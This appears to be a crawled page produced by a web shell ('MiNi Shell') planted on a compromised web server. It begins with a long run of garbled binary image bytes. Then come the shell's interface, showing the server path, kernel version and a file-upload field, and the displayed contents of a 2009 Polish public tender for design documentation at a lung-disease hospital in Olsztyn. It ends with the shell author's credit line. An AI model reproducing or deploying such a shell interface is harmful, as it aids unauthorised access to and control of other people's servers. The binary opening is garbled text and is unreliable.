JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/126618-N-2009.html

<p class="kh_header"><b>Olsztyn: Wykonanie dokumentacji projektowo-kosztorysowej</b><br>
<b>Numer ogłoszenia: 126618 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania przetargowego jest  wykonanie dokumentacji dla następujących zadań:
a) Zadanie Nr 1: Przebudowa pomieszczeń szatni pracowników z węzłem higieniczno - sanitarnym  w poziomie piwnic skrzydła diagnostycznego i budynku mieszkalno - gospodarczego.                     Dokumentacja  niniejszego zadania dotyczy utworzenia w poziome piwnic skrzydła diagnostycznego  i  budynku mieszkalno - gospodarczego szatni dla 60 osób  (na zmianie przebywa maksymalnie 23 osoby). (Rysunek poglądowy stanu obecnego piwnicy stanowi Załącznik Nr 5 i Nr 5 c.d.).
b) Zadanie Nr 2: Przebudowa pomieszczenia na odpady medyczne z wydzieleniem części na odpady pokonsumpcyjne.                                                                                                                                            Dokumentacja do niniejszego zadania winna uwzględniać rozdzielenie pomieszczenia magazynu odpadów, które jest zlokalizowane w okolicach kotłowni, o wymiarach wewnętrznych  4,5 x 3,8m,  na dwa mniejsze pomieszczenia: magazyn odpadów pokonsumpcyjnych i magazyn odpadów medycznych. Magazyn odpadów medycznych należy zaprojektować zgodnie z Rozporządzeniem Ministra Zdrowia            z dnia 23.08.2007 roku w sprawie szczegółowego sposobu postępowania z odpadami medycznymi. Czas magazynowania odpadów nie przekracza 48 godzin. (Rysunek poglądowy stanu obecnego magazynu odpadów stanowi Załącznik Nr 6).
c)  Zadanie Nr 3: Przebudowa komina na budynku kotłowni.                                                                Sporządzona dokumentacja winna obejmować opinię techniczną. (Elewacja okolic komina do podniesienia stanowi Załącznik Nr 7).
d)  Zadanie Nr 4: Modernizacja budynku tlenowni.                                                                             Sporządzona dokumentacja winna obejmować dostosowanie budynku tlenowni do obowiązujących przepisów i warunków technicznych, docieplenie budynku, przebudowa dachu z dociepleniem, usunięcie płyt falistych azbestowo - cementowych, modernizacja aparatury dozującej wraz                     z instalacją tlenu medycznego w budynku, remont ogólny.
e)  Zadanie Nr 5:  Przebudowa instalacji odgromowej.                                                                          Sporządzona dokumentacja winna obejmować ekspertyzę, pomiary.
f)   Zadanie Nr 6: Doraźny remont trzech budynków gospodarczych.    
     Niniejsze zadanie polega na sporządzeniu dokumentacji dla budynku agregatu prądotwórczego, budynku magazynowo-warsztatowego, budynku magazynowego.                                                                                                       
2.  Dokumentacja projektowo-kosztorysowa dla Zadań od Nr 1 do  Nr 5  powinna zawierać:       
     a)  inwentaryzację  istniejącego stanu w zakresie wszystkich branż oraz ocenę stanu technicznego dla potrzeb  rozwiązania projektowego,   
     b) projekt budowlano - wykonawczy                                                                                                                      c) rozwiązanie projektowe,                                                                                                                               d) projekty wszystkich branż niezbędnych do funkcjonowania projektowanego zakresu,                                                                                                                                               e) przedmiary robót,                                                                                                                                     f)  kosztorysy inwestorskie,                                                                                                                             g) specyfikacje techniczne wykonania i odbioru robót.
    
     Dokumentacja dla Zadania  Nr 6  powinna zawierać jedynie:  
a)  przedmiary robót,                                                                                                                                      b)  kosztorysy inwestorskie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zgodnie z art. 45 ust. 2 ustawy Zamawiający nie wymaga  wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy złożą ważną i odpowiednio przygotowaną ofertę  oraz :

a)	są uprawnieni do występowania w obrocie prawnym,
b)	posiadają uprawnienia do wykonania niniejszego zamówienia,
c)	   posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania niniejszego zamówienia,
d)	    znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia,
e)	    nie podlegają wykluczeniu z postępowania o zamówienie na podstawie art. 24 ust.1 i 2 ustawy.
2.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy zobowiązani są dołączyć do przedkładanej oferty oświadczenia i dokumenty określone w Rozdziale V niniejszej SIWZ Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie dokumentów          i oświadczeń jakich żąda od Wykonawców w pkt V SIWZ, stosując formułę spełnia - nie spełnia  wypełniając druk ZP - 14..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony  Formularz ofertowy - Załącznik Nr 1. 
2.	Oświadczenie o spełnianiu warunków wymaganych przez Zamawiającego - Załącznik Nr 2.
3.	Aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy  w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
4.	Wskazanie osoby upoważnionej do podpisania umowy (w przypadku wyłonienia Wykonawcy                     w niniejszym postępowaniu) oraz jej aktualne pełnomocnictwo, o ile jej prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
5. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż                3 miesiące przed upływem terminu składania ofert, potwierdzające, że  Wykonawca nie zalega                     z opłacaniem podatków, opłat.
7.  Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert, potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne.       
8. Dokumenty potwierdzające uprawnienia oraz aktualne zaświadczenia o przynależności do izb  budowlanych całego zespołu projektowego.
9. Wykaz  min. 3  dokumentacji technicznych (najlepiej o podobnym charakterze), sporządzonych dla jednostek prowadzących działalność związaną ze służbą zdrowia.  Wykaz powinien zawierać wartość robót, daty ich realizacji, miejsce wykonania.
10.Dokument potwierdzający i odbycie wizji lokalnej na terenie Samodzielnego Publicznego Zespołu Gruźlicy i Chorób Płuc w Olsztynie zatwierdzony przez Zastępcę Dyrektora ds. Technicznych lub spec. ds. nadzoru budowlanego.
11.Zaakceptowany (podpisany) projekt umowy.
12.Wymagane dokumenty w przypadku składania oferty przez podmioty działające wspólnie na  podstawie  zawartej na piśmie umowy: 
12.1 Oferta składana przez dwa lub kilka podmiotów, które występują wspólnie - konsorcja (tj. osoby fizyczne, osoby prawne oraz jednostki organizacyjne nie posiadające osobowości prawnej) musi spełniać następujące wymagania:
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania                             w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego a takie pełnomocnictwo musi być podpisane przez osoby upoważnione do reprezentowania wszystkich Wykonawców.
b) Każdy z uczestników Konsorcjum dołączy do oferty oświadczenie, że w przypadku wygrania przetargu, będzie ponosił solidarną odpowiedzialność wobec Zamawiającego na etapie realizacji zamówienia jak i z tytułu udzielonych gwarancji i rękojmi.
12.2.  Każdy z wykonawców musi oddzielnie złożyć dokumenty i oświadczenia zawarte w Rozdziale V ust. 2, 5, 6, 7. Pozostałe dokumenty mające na celu potwierdzenie spełnienia wymogów  SIWZ oferenci złożą wspólnie.
12.3. Wniesienie wadium musi wyraźnie wskazywać na wszystkich wykonawców składających wspólną ofertę.
12.4.  Oferta składana przez spółkę cywilną musi zawierać:
a)  umowę spółki,
b)  wszystkie dokumenty wymienione w SIWZ,
c) każdy ze wspólników musi oddzielnie złożyć oświadczenie, o którym mowa w Rozdziale  V ust.2, 5, 6, 7.
12.5. W przypadku oferty składanej przez spółkę z o.o., gdy wartość zamówienia przekracza podwójną wysokość  kapitału zakładowego, zarząd spółki powinien być upoważniony uchwałą zgromadzenia wspólników do zawierania umowy (art. 230 Kodeksu Spółek  Handlowych)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Budynek administracji pok. 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1: Przebudowa pomieszczeń szatni pracowników z węzłem higieniczno - sanitarnym  w poziomie piwnic skrzydła diagnostycznego i budynku mieszkalno - gospodarczego..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zadanie polega na utworzeniu w poziome piwnic skrzydła diagnostycznego i  budynku mieszkalno - gospodarczego szatni dla 60 osób  (na zmianie przebywa maksymalnie 23 osoby)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2: Przebudowa pomieszczenia na odpady medyczne z wydzieleniem części na odpady pokonsumpcyjne..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zadanie polega na rozdzieleniu pomieszczenia magazynu odpadów, które jest zlokalizowane w okolicach kotłowni, o wymiarach wewnętrznych  4,5 x 3,8m,  na dwa mniejsze pomieszczenia: magazyn odpadów pokonsumpcyjnych i magazyn odpadów medycznych. Magazyn odpadów medycznych należy zaprojektować zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 23.08.2007 roku w sprawie szczegółowego sposobu postępowania z odpadami medycznymi. Czas magazynowania odpadów nie przekracza 48 godzin..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa komina na budynku kotłowni..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzona dokumentacja winna obejmować opinię techniczną..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4: Modernizacja budynku tlenowni..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzona dokumentacja winna obejmować dostosowanie budynku tlenowni do obowiązujących przepisów i warunków technicznych, docieplenie budynku, przebudowa dachu z dociepleniem, usunięcie płyt falistych azbestowo - cementowych, modernizacja aparatury dozującej wraz z instalacją tlenu medycznego w budynku, remont ogólny.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa instalacji odgromowej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzona dokumentacja winna obejmować ekspertyzę, pomiary..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6: Doraźny remont trzech budynków gospodarczych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zadanie polega na sporządzeniu dokumentacji dla budynku agregatu prądotwórczego, budynku magazynowo-warsztatowego, budynku magazynowego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com